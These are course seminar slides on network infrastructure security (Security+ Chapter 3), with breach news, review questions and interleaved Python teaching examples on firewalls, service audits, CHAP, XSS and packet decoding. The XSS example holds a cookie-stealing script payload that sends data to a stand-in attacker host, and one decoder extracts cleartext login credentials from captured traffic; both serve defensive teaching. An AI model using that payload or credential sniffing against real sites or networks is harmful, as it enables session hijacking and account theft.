UNIT 3 SEMINAR Unit 3 Chapter 3 in CompTIA Security + Course Name – IT286-01 Introduction to...
UNIT 3 SEMINAR
Unit 3, Chapter 3 in CompTIA Security+
Course Name – IT286-01 Introduction to Network Security
Instructor – Jan McDanolds, MS, Security+
Contact Information: Google chat - jmcdanolds; Email – [email protected]
Hours: Tuesday, 7:00 PM ET or Thursday, 7:00 PM ET
UNIT 3
Security in the news…
July 12, 2012 – Hackers post 450K credentials apparently pilfered from Yahoo
Yahoo appears to have been the victim of a security breach that yielded hundreds of thousands of login credentials stored in plain text. The hacked data, posted to the hacker site D33D Company, contained more than 453,000 login credentials and appears to have originated from the Web pioneer’s network. The hackers, who said they used a union-based SQL injection technique to penetrate the Yahoo subdomain (Yahoo Voices), intended the data dump to be a “wake-up call.”
http://www.databreaches.net/?p=24724
Follow-up: Regulators criticize NYSEG for computer security breach
The New York State Public Service Commission (Commission) today received a report from Department of Public Service staff that both New York State Electric & Gas Corporation (NYSEG) and Rochester Gas & Electric (RG&E) failed to adequately protect confidential customer information from unauthorized access by outside parties.
In January 2012, NYSEG advised the Department that unauthorized parties had obtained access to confidential information of both NYSEG and RG&E customers, including Social Security Numbers, dates of birth, and in some cases, financial institution account information.
http://www.databreaches.net/?p=24738
UNIT 3
Security in the news…
Living a Lie - Identity Theft That Lasted Decades (10/1/2012)
When Florida Highway Patrol Trooper Richard Blanco—a member of the FBI’s Joint Terrorism Task Force (JTTF) in Jacksonville—interviewed an individual suspected of driver’s license fraud in 2011, he wasn’t initially sure if the man was the victim or the perpetrator of identity theft.
That’s because the man—now imprisoned and officially known as John Doe—had a stack of government-issued identification acquired during the 22 years he had been using a living victim’s identity. That included a passport, driver’s license, birth certificate, Social Security card, and identification allowing him unescorted access to a port and military installation.
http://www.fbi.gov/news/stories/2012/october/identity-theft-that-lasted-decades
UNIT 3
Security in the news…
Information Technology Sector – DHS Daily Open Source Infrastructure Report
October 2, Softpedia – (International) Prolexic: ‘itsoknoproblembro’ DDoS attacks are highly sophisticated. Experts from Prolexic Technologies claim a new type of distributed denial-of-service (DDoS) attack has not only increased in size, but also reached a new level of sophistication. DDoS attacks have recently caused a lot of problems for organizations; in September, the sites of several financial institutions were disrupted as a result of such operations. Prolexic found that many of the recent attacks against their customers relied on the itsoknoproblembro DDoS toolkit. Prolexic recorded massive sustained floods, some of which peaked at 70 Gbps and over 30 million pps. Itsoknoproblembro includes a number of application layer and infrastructure attack vectors, such as UDP and SSL encrypted attack types, SYN floods, and ICMP. The botnet that powers these attacks contains a large number of legitimate IP addresses. This allows the attack to bypass the anti-spoofing mechanisms deployed by companies.
The DHS Daily Open Source Infrastructure Report is collected each business day as a summary of open-source published information concerning significant critical infrastructure issues.
https://www.dhs.gov/dhs-daily-open-source-infrastructure-report
UNIT 2 REVIEW
What was covered in Unit 2…
Chapter 2 Review – Identifying Potential Risks
If you don’t know what you’re up against, how do you prepare…
Calculating Attack Strategies
Recognizing Common Attacks
Identifying TCP/IP Security Concerns
Understanding Software Exploitation
Understanding OVAL
Surviving Malicious Code
Understanding Social Engineering
Auditing Processes and Files
UNIT 2 REVIEW
What was covered in Unit 2…
Chapter 2 - Identifying Potential Risks
Attack Strategies – the bad guys have one or more of these goals:
1. Access attack – gain access to resources
2. Modification or repudiation attack – modify information
3. Denial-of-service attack – disrupt the network, denying users access
Social engineering - preys on the trusting nature of people to breach security.
Auditing Processes and Files - security log files, security audit files
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… Open your ebook file to Chapter 2. Quick definitions.
Type a brief definition.
#1 – What is a zombie? What runs on a zombie?
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… (continued)
#2 - Name two…
Back Door Attacks
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… (continued)
#3 – Name two types of…
Password guessing attacks
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… (continued)
#4 – Give the well-known port number (and whether it is TCP or UDP) of …
SNMP, HTTPS, and DNS
CHAPTER 1 REVIEW
General Security Concepts
Rapid Fire… (continued)
#2 - Name the…
Three components of Physical Security
UNIT 3 - CHAPTER 3
Infrastructure and Connectivity
Protecting the flow of data…
Understanding Infrastructure Security
Understanding Network Infrastructure Devices
Monitoring and Diagnosing Networks
Securing Workstations and Servers
Understanding Mobile Devices
Understanding Remote Access
Securing Internet Connections
Understanding Network Protocols
Basics of Cabling, Wires and Communications
Employing Removable Media
CHAPTER 3
Understanding Infrastructure Security
How information flows…
Hardware Components: physical devices, such as routers, servers, firewalls, switches, workstations, etc.
Software Components: operating systems, applications, and management software
Example: NOC – Network Operations Center
AT&T Global Network Operations Center – http://www.corp.att.com/gnoc/
IP Backbone - AT&T has over 940,000 worldwide fiber-route miles, a worldwide network that includes 232,798 Wi-Fi hotspots, 16.4 million broadband connections in service, and more than 105 million wireless customers. The network carries approximately 33 petabytes of data on an average business day.
CHAPTER 3
Field Trip…
Visit to Akamai Technologies‘ state-of-the-art Network Operations Command Center, located in Cambridge, Massachusetts. The Akamai NOCC enables proactive monitoring and troubleshooting of all servers in the global Akamai network. 20 minute video.
ONLY the first 3 minutes - view the entire tour later… http://www.akamai.com/html/technology/nocc.html
Real Time Monitoring
CHAPTER 3
Network Infrastructure Devices
Firewall – the purpose is to isolate one network from another. Firewalls can be hardware, software, appliances, etc.
Types: packet filter, proxy, stateful inspection
Hub
Switch
Router
Modem
Remote Access Services
Telecom/PBX Systems
Virtual Private Networks
Wireless Access Points
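The three firewall types listed above differ in how much context they use to judge a packet. The toy filter below is an added example (my code, not from the course or the textbook): it runs a stateless packet filter and a stateful-inspection filter over the same constructed traffic to show why a stateless "allow inbound packets with ACK set" rule lets a forged probe through while a state table does not. The 10.0.0.0/8 inside network, the policy, and the three packets are assumptions made for the demo.

```python
"""Added example: stateless packet filter vs stateful inspection on constructed traffic.

Assumptions (not from the slides): the protected LAN is 10.0.0.0/8 and the policy is
"inside hosts may open TCP connections outward; nothing outside may open one inward".
"""
from collections import namedtuple
from ipaddress import ip_address, ip_network

INSIDE = ip_network("10.0.0.0/8")  # assumed protected network

# A packet is just the header fields a filter looks at; flags is a set of TCP flag names.
Packet = namedtuple("Packet", "src sport dst dport flags")


def is_inbound(pkt):
    return ip_address(pkt.src) not in INSIDE


def stateless_filter(pkt):
    """Packet filter: every packet is judged on its own header fields.

    To let reply traffic back in, the only stateless option is a rule such as
    'allow inbound TCP with the ACK bit set' (the classic "established" rule).
    That rule cannot tell a genuine reply from an attacker-crafted ACK packet.
    """
    if not is_inbound(pkt):
        return True                  # outbound traffic is always permitted
    return "ACK" in pkt.flags        # inbound allowed only if it "looks like" a reply


class StatefulFilter:
    """Stateful inspection: inbound packets are permitted only when they belong
    to a connection that an inside host initiated (recorded in a state table)."""

    def __init__(self):
        self.table = set()           # (inside_ip, inside_port, outside_ip, outside_port)

    def allow(self, pkt):
        if not is_inbound(pkt):
            if "SYN" in pkt.flags and "ACK" not in pkt.flags:
                # new outbound connection: remember its 4-tuple
                self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return True
        # inbound: must be the reverse of a flow we have already seen leave
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        return key in self.table


# Constructed traffic: a legitimate web session plus a forged inbound ACK probe
CLIENT_SYN = Packet("10.1.2.3", 51000, "203.0.113.10", 80, {"SYN"})
SERVER_REPLY = Packet("203.0.113.10", 80, "10.1.2.3", 51000, {"SYN", "ACK"})
FORGED_ACK = Packet("198.51.100.7", 4444, "10.1.2.3", 445, {"ACK"})  # ACK-scan style probe


def compare():
    """Return {name: (stateless_verdict, stateful_verdict)} for the sample traffic,
    processed in arrival order so the state table sees the SYN first."""
    stateful = StatefulFilter()
    results = {}
    for name, pkt in [("client_syn", CLIENT_SYN),
                      ("server_reply", SERVER_REPLY),
                      ("forged_ack", FORGED_ACK)]:
        results[name] = (stateless_filter(pkt), stateful.allow(pkt))
    return results


if __name__ == "__main__":
    for name, (stateless, stateful) in compare().items():
        print(f"{name:13s} stateless={'allow' if stateless else 'drop':5s} "
              f"stateful={'allow' if stateful else 'drop'}")
```

Both filters pass the outbound SYN and the real SYN/ACK reply; only the stateful filter drops the forged ACK to port 445, because no inside host ever opened a connection to 198.51.100.7. A proxy firewall goes one step further than either by terminating the connection itself and inspecting the application data, which this toy does not model.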
CHAPTER 3
Monitoring/Diagnosing Networks
What you don’t know can hurt you…
Network Monitors (sniffers)
Intrusion Detection Systems - IDS (discussed later)
Field Trips…
http://learn-networking.com/network-security/three-archaic-backdoor-trojan-programs-that-still-serve-great-pranks
Back Orifice 2000 – be careful! http://support.microsoft.com/kb/237280
Nmap ("Network Mapper") is a free utility for network exploration or security auditing. http://nmap.org/
Password Crackers – http://sectools.org/crackers.html
CHAPTER 3
Securing Workstations and Servers
Hardening systems:
Both workstations and servers are vulnerable.
Remove unused software, services and processes
Ensure that all workstations, servers and applications are up to date - patches, updates, fixes
Minimize information dissemination about the system
Ex: Lock down configuration settings, use group policies and security templates, disable unneeded functions, evaluate sharing services. Windows Server 2008 – Security Configuration Wizard
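The "remove unused services" and "evaluate sharing services" steps above are easier to enforce when the host is compared against a written baseline for its role. The script below is an added example (mine, not from the course): it parses the output format of the Linux `ss -tlnp` command and flags every listening TCP socket that is not on an assumed allow-list for a web server, ranking sockets bound to all interfaces above loopback-only ones. The `ss` lines are constructed for the demo, not captured from a real host, and the allow-list is an assumption.

```python
"""Added example: baseline check for unneeded listening services.

The sample `ss -tlnp` output and the allow-list below are constructed for the demo.
"""
import re

# Assumed allow-list for a web-server role: (port, process name) pairs that may listen.
WEB_SERVER_BASELINE = {(22, "sshd"), (80, "nginx"), (443, "nginx")}

# Constructed output in the layout `ss -tlnp` prints on Linux (not a real capture).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:443          0.0.0.0:*          users:(("nginx",pid=1203,fd=6))
LISTEN  0       511     0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=1203,fd=5))
LISTEN  0       50      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=977,fd=21))
LISTEN  0       128     0.0.0.0:21           0.0.0.0:*          users:(("vsftpd",pid=1410,fd=3))
LISTEN  0       5       0.0.0.0:111          0.0.0.0:*          users:(("rpcbind",pid=600,fd=4))
"""

# State, Recv-Q, Send-Q, Local Address:Port, Peer Address:Port, then the first process name.
LINE_RE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)"')

ALL_INTERFACES = {"0.0.0.0", "*", "::", "[::]"}


def parse_listeners(text):
    """Return [(bind_address, port, process)] for every LISTEN line."""
    found = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            found.append((m.group(1), int(m.group(2)), m.group(3)))
    return found


def audit(listeners, baseline):
    """Return findings as (severity, port, process, bind_address), sorted so that
    sockets reachable from the network come first, then by port number."""
    findings = []
    for addr, port, proc in listeners:
        if (port, proc) in baseline:
            continue                                   # expected for this role
        exposed = addr in ALL_INTERFACES
        findings.append(("HIGH" if exposed else "LOW", port, proc, addr))
    return sorted(findings, key=lambda f: (f[0] != "HIGH", f[1]))


def audit_sample():
    return audit(parse_listeners(SAMPLE_SS_OUTPUT), WEB_SERVER_BASELINE)


if __name__ == "__main__":
    for severity, port, proc, addr in audit_sample():
        print(f"{severity:4s} port {port:<5d} {proc:10s} bound to {addr}")
```

On the sample, the FTP daemon and rpcbind are flagged HIGH (network-reachable and not part of the role), while MySQL bound to 127.0.0.1 is LOW: still worth reviewing, but not directly exposed. The same idea carries over to Windows (`netstat -ano` plus the service list), which is what the Security Configuration Wizard automates.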
CHAPTER 3
Understanding Mobile Devices
Who is connecting to your network through a wireless device?
Includes pagers, PDAs, cell phones, etc.
WTLS (Wireless Transport Layer Security) layer
WAP (Wireless Application Protocol)
WSP (Wireless Session Protocol)
CHAPTER 3
Understanding Remote Access
Point-to-Point Protocol (PPP) plus CHAP – Challenge Handshake Authentication Protocol
Tunneling Protocols:
PPTP
L2F
L2TP
Secure Shell (SSH)
IPSec (IP Security, used with tunneling protocols)
802.1X (port-based network access control, used with wireless and wired switch ports)
RADIUS
TACACS/TACACS+
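CHAP, listed above with PPP, is worth seeing as an actual exchange rather than an acronym. The code below is an added example (my own, not from the course, the textbook, or any vendor's implementation): it carries out the RFC 1994 challenge/response between an authenticator (the remote-access server that holds the secrets) and a peer (the dial-in client), then shows that a wrong secret and a replayed response are both rejected. The peer name "alice" and its secret are constructed; MD5 is used only because that is what CHAP specifies.

```python
"""Added example: the CHAP exchange of RFC 1994, both sides, on constructed secrets.

Response = MD5(Identifier || secret || Challenge); the secret itself never crosses the link.
"""
import hashlib
import os
import secrets


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 section 2: one-way hash over Identifier, then secret, then Challenge."""
    return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


class Authenticator:
    """The side that holds the secrets (e.g. a RAS server) and issues challenges.
    CHAP needs each secret in recoverable form, which is itself a reason to guard this host."""

    def __init__(self, peer_secrets: dict, rng=os.urandom):
        self.peer_secrets = peer_secrets
        self.rng = rng
        self.identifier = 0
        self.outstanding = {}            # identifier -> challenge value not yet answered

    def challenge(self):
        """Send a Challenge packet: (Identifier, 16 random octets)."""
        self.identifier = (self.identifier + 1) & 0xFF
        value = self.rng(16)
        self.outstanding[self.identifier] = value
        return self.identifier, value

    def verify(self, identifier: int, response: bytes, name: str) -> bool:
        """Check a Response packet. A challenge is usable exactly once."""
        value = self.outstanding.pop(identifier, None)
        secret = self.peer_secrets.get(name)
        if value is None or secret is None:
            return False
        expected = chap_response(identifier, secret, value)
        return secrets.compare_digest(expected, response)   # constant-time comparison


class Peer:
    """The dial-in client: it knows only its own name and secret."""

    def __init__(self, name: str, secret: bytes):
        self.name, self.secret = name, secret

    def respond(self, identifier: int, challenge: bytes):
        """Answer a Challenge with a Response packet: (Identifier, hash, Name)."""
        return identifier, chap_response(identifier, self.secret, challenge), self.name


PEER_SECRETS = {"alice": b"correct horse"}   # constructed for the demo


def run_exchange(peer_secret=b"correct horse", replay=False) -> bool:
    """Run one CHAP exchange and return the authenticator's verdict.

    replay=True models an attacker who captured (Identifier, Response) from an
    earlier session and presents it when a fresh challenge is issued.
    """
    auth = Authenticator(PEER_SECRETS)
    peer = Peer("alice", peer_secret)
    ident, value = auth.challenge()               # Challenge  ->
    ident, resp, name = peer.respond(ident, value)   # <- Response
    if replay:
        ident2, _ = auth.challenge()              # new session, new random challenge
        return auth.verify(ident2, resp, name)    # old response no longer matches
    return auth.verify(ident, resp, name)


if __name__ == "__main__":
    print("genuine peer:", run_exchange())
    print("wrong secret:", run_exchange(peer_secret=b"wrong"))
    print("replayed response:", run_exchange(replay=True))
```

Two practical points follow from the code: the exchange protects the secret from a passive sniffer only as long as the secret is strong (an attacker who captures challenge and response can try guesses offline, the same weakness as a captured password hash), and the authenticator must store secrets in cleartext or reversible form, unlike a hashed password file. MS-CHAPv2, RADIUS and TACACS+ address parts of this, but the challenge/response shape is the same.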
CHAPTER 3
Securing Internet Connections
Ports and Sockets
E-mail
E-mail protocols: SMTP, POP/POP3, IMAP
E-mail vulnerabilities: SPAM, hoaxes
Web
Secure web connections: SSL/TLS, HTTP/S
Web vulnerabilities:
ActiveX
Buffer Overflows
CGI
Cookies
Cross-site Scripting (XSS)
Input validation
Java Applets
JavaScript
Popups
Signed Applets
SMTP Relay
FTP
Blind/Anonymous FTP
Secure FTP
Sharing Files
Vulnerabilities
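Three of the web items above (cross-site scripting, input validation, cookies) are easiest to understand side by side in code. The block below is an added example (mine, not from the course): a page-rendering function that reflects user input straight into HTML, its hardened counterpart that output-encodes, a server-side allow-list validator for a username field, and a session cookie with the attributes that limit what a successful XSS can steal. The function names, the username rule and the probe string are constructed for the demo.

```python
"""Added example: reflected XSS, output encoding, input validation, cookie hardening.

The username rule, the probe payload and the cookie name are assumptions for the demo.
"""
import html
import re
from http.cookies import SimpleCookie

# Assumed allow-list for a username field: letters, digits, _ . - and a length cap.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Constructed XSS probe of the kind an attacker reflects through a URL parameter.
PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'


def render_greeting_vulnerable(name: str) -> str:
    """User input concatenated into HTML unchanged: whatever markup the user
    supplied is interpreted by the browser (reflected XSS)."""
    return "<p>Welcome back, " + name + "!</p>"


def render_greeting_hardened(name: str) -> str:
    """Output encoding: characters with meaning in HTML (< > & " ') become entities,
    so the input is displayed as text and never parsed as markup."""
    return "<p>Welcome back, " + html.escape(name, quote=True) + "!</p>"


def validate_username(name: str) -> bool:
    """Server-side input validation: accept only what the field is meant to hold.
    Validation shrinks the attack surface, but output encoding is still required
    because free-text fields cannot be this strict."""
    return USERNAME_RE.fullmatch(name) is not None


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie value for the session cookie.
    HttpOnly keeps it out of document.cookie (so the payload above would read nothing),
    Secure keeps it off plain HTTP, SameSite=Lax limits cross-site sending."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print("vulnerable:", render_greeting_vulnerable(PAYLOAD))
    print("hardened:  ", render_greeting_hardened(PAYLOAD))
    print("valid username?", validate_username(PAYLOAD))
    print("Set-Cookie:", session_cookie_header("opaque-random-id"))
```

The hardened output contains `&lt;script&gt;`, which a browser renders as the literal text; the vulnerable output contains a live script tag. Note that `html.escape` is the right encoder only for HTML body and attribute context; input placed into JavaScript, URLs or CSS needs the encoder for that context, which is the general rule behind the "input validation" entry in the list.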
CHAPTER 3
Securing Internet Connections
Large carriers and content delivery networks (AT&T, Akamai, etc.) monitor attack traffic across their networks and publish what they see.
Example: State of the Internet Report
Each quarter, Akamai publishes a "State of the Internet" report. This report includes data gathered across Akamai's global server network about attack traffic, average & maximum connection speeds, Internet penetration and broadband adoption, and mobile usage, as well as trends seen in this data over time.
Posted in Doc Sharing – the .pdf shows slides of the report
http://www.akamai.com/stateoftheinternet/
CHAPTER 3
Ports, Sockets and Sniffers
Port Scanners: http://sectools.org/port-scanners.html
Packet Sniffers: http://sectools.org/sniffers.html and http://www.wireshark.org/download.html
Vulnerability Scanners: http://sectools.org/tag/vuln-scanners/
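What a packet sniffer actually recovers from the wire is easier to grasp with a decoder than with a tool screenshot. The block below is an added example (my code, not from the course, Wireshark or any of the linked tools): it builds one IPv4/TCP packet from constructed fields, decodes it the way a sniffer would (addresses, ports, flags, payload), and then checks whether the payload carries a login to one of the cleartext e-mail or file-transfer ports from the earlier slides. Addresses, ports and the POP3 credentials are made up, and the packet checksums are left at zero because the bytes are only parsed, never sent.

```python
"""Added example: decode an IPv4/TCP packet and spot cleartext credentials.

The packet is constructed here (zero checksums) so the decoder can be run offline.
"""
import socket
import struct

# Well-known ports whose login exchange travels in the clear (assumed list for the demo).
CLEARTEXT_LOGIN_PORTS = {21: "FTP", 23: "Telnet", 110: "POP3", 143: "IMAP"}

TCP_FLAG_NAMES = [(0x02, "SYN"), (0x10, "ACK"), (0x08, "PSH"), (0x01, "FIN"), (0x04, "RST")]

IPV4_HDR = "!BBHHHBBH4s4s"   # ver/ihl, tos, total length, id, flags/frag, ttl, proto, csum, src, dst
TCP_HDR = "!HHIIBBHHH"       # sport, dport, seq, ack, data offset, flags, window, csum, urgent


def build_ipv4_tcp(src, dst, sport, dport, payload: bytes) -> bytes:
    """Construct IPv4 header (no options) + TCP header (no options) + payload."""
    total_len = 20 + 20 + len(payload)
    ip_hdr = struct.pack(IPV4_HDR, 0x45, 0, total_len, 0x1234, 0, 64, 6, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    tcp_hdr = struct.pack(TCP_HDR, sport, dport, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    return ip_hdr + tcp_hdr + payload


def parse_ipv4_tcp(frame: bytes) -> dict:
    """Decode the fields a sniffer displays; reject anything that is not IPv4/TCP."""
    if len(frame) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack(IPV4_HDR, frame[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    if proto != 6:
        raise ValueError("not TCP")
    ihl = (ver_ihl & 0x0F) * 4                       # header length in bytes
    tcp = frame[ihl:total_len]
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, _, _, off_res, flags, _, _, _ = struct.unpack(TCP_HDR, tcp[:20])
    data_off = (off_res >> 4) * 4
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "sport": sport, "dport": dport,
        "flags": [name for bit, name in TCP_FLAG_NAMES if flags & bit],
        "payload": tcp[data_off:],
    }


def find_cleartext_credentials(pkt: dict):
    """Return [(service, field, value)] for USER/PASS lines sent to a cleartext login port."""
    service = CLEARTEXT_LOGIN_PORTS.get(pkt["dport"])
    if service is None:
        return []
    hits = []
    for line in pkt["payload"].split(b"\r\n"):
        parts = line.split(b" ", 1)
        if len(parts) == 2 and parts[0].upper() in (b"USER", b"PASS"):
            hits.append((service, parts[0].decode(), parts[1].decode(errors="replace")))
    return hits


# Constructed capture: a POP3 client logging in over port 110 with no TLS.
SAMPLE = build_ipv4_tcp("192.0.2.10", "192.0.2.20", 52000, 110, b"USER alice\r\nPASS hunter2\r\n")

if __name__ == "__main__":
    pkt = parse_ipv4_tcp(SAMPLE)
    print(f"{pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']} {pkt['flags']}")
    for service, field, value in find_cleartext_credentials(pkt):
        print(f"  {service} {field} = {value!r}")
```

The decoder needs no special privileges because it works on bytes it built itself; pointing the same logic at a real capture means reading frames from a raw socket or a pcap file, which is exactly what the sniffers linked above do. The fix for what it finds is on the slide before: POP3S/IMAPS or STARTTLS, SFTP instead of FTP, SSH instead of Telnet.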
CHAPTER 3
SNMP and Other TCP/IP Protocols
Simple Network Management Protocol (SNMP)
Internet Control Message Protocol (ICMP)
Internet Group Management Protocol (IGMP)
ICMP vulnerability - a denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol (ICMP) message to an affected system.
http://www.securiteam.com/exploits/5SP0N0AFFU.html
http://www.securiteam.com/securitynews/
CHAPTER 3
Cabling, Wires and Communications
Coax
Unshielded and Shielded Twisted Pair (UTP/STP)
Fiber Optic
Infrared
Radio Frequency
Microwave
CHAPTER 3
Removable Media
Data on the move…
CD-R/DVD-R
Diskettes
Flash Cards
Hard Drives
Network Attached Storage
Smart Cards
Tape
Thumb Drives
UNIT 3
Unit 3 Assignment
1. Explain the vulnerabilities and mitigations associated with network devices (hardware).
2. Explain the vulnerabilities and mitigations associated with various transmission media such as coax, UTP, fiber, etc.
UNIT 3
Unit 3 Assignment
1. Explain the vulnerabilities and mitigations associated with network devices (hardware). At least five devices – firewall, router, switch, etc.
Example: discuss how a router works, how it is vulnerable to attack/malfunction, AND how it can be protected. One paragraph for each of five devices.
2. Explain the vulnerabilities and mitigations associated with various transmission media such as coax, UTP, fiber, etc. At least one paragraph on each of these three.